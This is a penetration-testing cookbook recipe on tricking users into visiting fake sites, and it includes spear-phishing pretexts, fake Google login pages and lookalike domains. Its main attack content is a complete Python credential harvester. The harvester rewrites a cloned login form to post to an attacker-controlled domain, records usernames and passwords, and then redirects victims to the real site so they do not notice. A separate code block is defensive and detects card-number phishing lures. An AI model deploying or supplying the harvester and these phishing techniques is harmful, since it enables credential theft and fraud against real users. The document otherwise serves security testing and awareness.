Tricking the user to go to our fake site

The success of every social engineering attack lies in the attacker's ability to convince the user and in the user's willingness to follow the attacker's instructions. This recipe is a series of situations and techniques that attackers use to make their cons more believable to a user and catch them.

In this section, we will see some of the attacks that have worked in previous security assessments on users who were security conscious to a certain level and wouldn't fall for the classic "bank account update" scam.

How to do it...

  1. Do your homework: If it is a spear phishing attack, do thorough research about your target: social networks, forums, blogs, and any source of information that tells you what your target is into. Maltego, which is included in Kali Linux, may be very useful for this task. Then build a pretext (a fake story) or a theme for the attack based on that.

    We once found a client's employee who was posting a lot of images, videos, and texts about angels on her Facebook page. We gathered some of the content from her page and built a PowerPoint presentation, which also included an exploit to gain remote execution on the client's computer, and sent it to her by e-mail.

  2. Create controversy: If the target is an opinion leader in some field, using their own words to get them interested in what you have to tell them might help.

    We were hired to perform a penetration test on a financial corporation, and the engagement rules allowed social engineering. Our target was a person who is well known in economic and financial circles: he writes articles in known magazines, gives interviews, appears in economics news, and so on. Our team did some research about him and found an article on an economics magazine's website. That article included his e-mail address at his company (our client). We looked for more information about the article and found some comments and quotations about it on other sites. With that, we put together an e-mail saying that we had some comments about the article, giving a teaser in the message and linking, through a shortened link, to a document in Google Drive where the full comments could be read.

    That shortened link (which also hides the real destination from a casual look) led him to a fake Google login page controlled by us, which gave us his corporate e-mail address and password.

  3. Say who you are; well, not exactly: Saying "I'm a security researcher and I have found something in your system" can be a great hook for developers and systems administrators.

    On another engagement, we specifically had to social-engineer the systems administrator of a company. At first we didn't find any useful information about him on the Web, but we found some vulnerabilities in one of the company's websites. We used that to send an e-mail to our target saying that we had found a few important vulnerabilities in the company's servers and could help fix them, attaching an image as evidence and a link to a Google Drive document (another fake login page).

  4. Insist and push (lightly): Sometimes you won't receive an answer on the first attempt. Always analyze the results (did the target click the link? did the target submit information to the fake page?) and make adjustments for a second try.

    We didn't receive an answer in the sysadmin scenario, nor a visit to the page, so we sent a second e-mail with a "full report" in PDF, saying that we would disclose the vulnerabilities on a public site if we didn't receive an answer; this time we got one.

  5. Make yourself credible: Adopt the terminology of the people you are impersonating and provide some truthful information. If you are sending a corporate e-mail, use the company's logo, get a free .tk or .co.nf domain for your fake site that resembles the real one, dedicate some time to designing or correctly copying the target site, and so on.

    A very common technique used by people trying to steal credit card data is to send a variation of the "you need to update your information" mail containing a partial credit card number, with the remaining digits masked by asterisk (*) characters.

    A legitimate message would say: "The information corresponding to your card: **** **** **** 3241". Crooks instead use: "The information corresponding to your card: 4916 **** **** ****", knowing that a number starting with 4 is a Visa card and that 4916 is a very common Visa prefix. The leading digits of a card number only identify the network and the issuer and are effectively public, so showing them proves nothing; only the last four digits tell a cardholder that the sender really has their card on file.
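The partial-card-number trick can be checked mechanically. The following is an added example (not code from the book): it finds a masked 16-digit card number in a message and reports whether the visible digits are the trailing four (the legitimate style) or the leading ones (the lure), mapping a visible leading group to its network using only the well-known Visa and Mastercard ranges. The two e-mail bodies are constructed samples based on the sentences above.

```python
"""Classify the masked card number in a "please update your information" message.

Added example, not from the book. The first six digits of a card number are the
issuer prefix (IIN/BIN) and the first digit alone identifies the network, so a
message that "proves" it knows your card by quoting the leading digits knows
nothing. A legitimate notice quotes the last four, which only the issuer and
the cardholder have.
"""
import re

# Four groups of four characters, each group either digits or mask characters,
# optionally separated by a space or a dash. Lookarounds stop us from matching
# the middle of a longer digit string.
_MASKED_CARD = re.compile(
    r"(?<![\d*])((?:\d{4}|[*xX]{4})(?:[ -]?(?:\d{4}|[*xX]{4})){3})(?![\d*])"
)

# Well-known network ranges only (assumption: enough for this heuristic).
NETWORK_BY_PREFIX = [
    (("51", "52", "53", "54", "55"), "Mastercard"),
    (("4",), "Visa"),
]


def network_for(prefix: str) -> str:
    """Map a visible leading group such as '4916' to its card network."""
    for starts, name in NETWORK_BY_PREFIX:
        if prefix.startswith(starts):
            return name
    return "unknown"


def classify_masked_card(text: str):
    """Return (style, groups, network) for the first masked card in text, or None.

    style is "last4"  when only the trailing group shows digits (legitimate),
             "prefix" when the leading group shows digits and the last is masked
                      (the phishing pattern),
             "other"  for anything else, e.g. a fully visible number.
    """
    m = _MASKED_CARD.search(text)
    if not m:
        return None
    raw = re.sub(r"[ -]", "", m.group(1))          # drop separators
    groups = [raw[i:i + 4] for i in range(0, 16, 4)]
    visible = [g.isdigit() for g in groups]
    if visible == [False, False, False, True]:
        style = "last4"
    elif visible[0] and not visible[-1]:
        style = "prefix"
    else:
        style = "other"
    network = network_for(groups[0]) if visible[0] else "hidden"
    return style, groups, network


def is_prefix_lure(text: str) -> bool:
    """True when the message only reveals the guessable leading digits."""
    result = classify_masked_card(text)
    return result is not None and result[0] == "prefix"


# Constructed sample messages, taken from the two sentences in the text.
LEGIT = "The information corresponding to your card: **** **** **** 3241"
LURE = "The information corresponding to your card: 4916 **** **** ****"

if __name__ == "__main__":
    for body in (LEGIT, LURE):
        print(classify_masked_card(body), "lure" if is_prefix_lure(body) else "ok")
```

Running it prints `('last4', ['****', '****', '****', '3241'], 'hidden') ok` for the legitimate wording and `('prefix', ['4916', '****', '****', '****'], 'Visa') lure` for the crook's version; the same check drops into a mail filter or an awareness-training grader.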
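Steps 2, 3 and 5 all rely on the same mechanism: a copied login page whose form posts to a server we control. As an added example (not the book's own code, and usable only where the engagement rules allow social engineering, as in the scenarios above), the block below shows the two mechanical parts of that fake site: rewriting the cloned page's form action so the credentials come to us, and a tiny handler that records the submission and then redirects the victim to the real login so nothing looks broken. The cloned HTML, the impersonated site and the harvester domain are all constructed/hypothetical.

```python
"""Minimal credential harvester for an authorized phishing exercise.

Added example, not from the book. A real clone would be saved from the target
site (wget or the browser's "save page") and be far larger; the <form> is the
only part that needs changing, and that is what rewrite_form_actions() does.
"""
import re
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical values: the site being impersonated and our fake site.
REAL_LOGIN_URL = "https://accounts.example.com/login"
HARVESTER_URL = "http://accounts-example.tk/login"   # attacker-controlled (assumed)

# Constructed sample of a cloned login page.
CLONED_HTML = """<html><body>
<form method="post" action="https://accounts.example.com/login" id="signin">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form></body></html>"""

# Matches <form ... action="..."> (either quote style) so the action can be swapped.
_ACTION_RE = re.compile(r'(<form\b[^>]*\saction=)(["\'])[^"\']*\2', re.IGNORECASE)


def rewrite_form_actions(html: str, harvester_url: str) -> str:
    """Point every <form action="..."> in the cloned page at our harvester.

    An absolute action would post straight back to the real site and we would
    capture nothing; a relative one would post to the same path on our host.
    Rewriting all of them covers both cases.
    """
    return _ACTION_RE.sub(lambda m: f"{m.group(1)}{m.group(2)}{harvester_url}{m.group(2)}", html)


def parse_credentials(body: bytes) -> dict:
    """Decode an application/x-www-form-urlencoded POST body into a flat dict."""
    fields = urllib.parse.parse_qs(body.decode("utf-8", errors="replace"), keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()}


CAPTURED = []   # in-memory log of submissions; write to disk in a real exercise


class HarvesterHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the rewritten clone for any path the shortened link lands on.
        page = rewrite_form_actions(CLONED_HTML, HARVESTER_URL).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(page)))
        self.end_headers()
        self.wfile.write(page)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        creds = parse_credentials(self.rfile.read(length))
        CAPTURED.append({"client": self.client_address[0], **creds})
        # Send the victim on to the real login: the "failed" attempt looks like a typo.
        self.send_response(302)
        self.send_header("Location", REAL_LOGIN_URL)
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), HarvesterHandler).serve_forever()
```

The redirect after capture is the detail that keeps the con alive: the target sees the genuine login page, assumes a mistyped password, logs in normally and never suspects the first page. Serve the clone from a lookalike domain (step 5) so the address bar does not give the game away.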

How it works...

Getting a person to open an e-mail from a total stranger, read it, click the links it contains, and provide the information requested on the page that opens can be hard work in these days of endless Nigerian prince scams. The key to a successful social engineering attack is to generate the feeling that the attacker is trying to do something good or necessary for the victim, and to create a sense of urgency so that the user must respond quickly or lose a valuable opportunity.

There's more...

Client-side attacks can also be used to escalate privileges on compromised servers. If you get access to a server but don't have much room to move, you may want to start a malicious server on your attacking machine and browse to it from the target, so that you can exploit other kinds of vulnerabilities (in the client software running on that host) and maybe gain command execution with higher privileges.

See also

Although a little dated, Kevin Mitnick's book, The Art of Deception: Controlling the Human Element of Security, is a very good collection of real-life social engineering attacks that may give you more ideas about how to get client-side attacks in front of users and how to get them to follow the steps needed to be exploited.

Also, there is a very interesting article about advance-fee scams (like the Nigerian prince one) that goes deep into the profiles of the victims and into how these kinds of scams, which are in essence social engineering attacks, have caused millions of dollars in losses to their victims: http://www.ultrascan-agi.com/public_html/html/pdf_files/Pre-Release-419_Advance_Fee_Fraud_Statistics_2013-July-10-2014-NOT-FINAL-1.pdf.
